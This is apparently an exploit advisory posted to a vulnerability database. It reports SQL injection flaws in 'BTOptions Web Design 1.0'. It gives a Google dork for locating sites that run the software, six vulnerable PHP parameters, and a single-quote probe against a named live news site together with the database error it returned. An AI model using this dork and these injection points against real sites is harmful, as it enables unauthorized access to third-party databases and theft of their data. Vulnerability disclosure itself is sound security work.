##############################################################################

# Exploit Title : BTOptions Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 30/12/2018
# Vendor Homepage : btoptions.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0 - WebServer Apache
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060262

##############################################################################

Designed & Developed by Web Based Business Systems BTOptions.Com SQL
Injection Vulnerability

##############################################################################

# Google Dork : intext:''Designed & Developed by Web Based Business
Systems, BT Options.''

# Exploits :

/rataperata_yana_gamana.php?image=[SQL Inj]

/newspack.php?issue=[SQL Inj]

/bnb.php?bnbId=&issue=[SQL Inj]

/hbr.php?issue=[SQL Inj]

/financial_times.php?issue=[SQL Inj]

/article.php?article=[SQL Inj]

##############################################################################

# Example Site :

businesstoday.lk/financial_times.php?issue=323'

=> [ Proof of Concept for SQL Inj ] => archive.is/qKjL4

# SQL Database Error :

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax
to use near 'and viewonhome=1 ORDER BY article.adddate DESC' at line 1

##############################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################################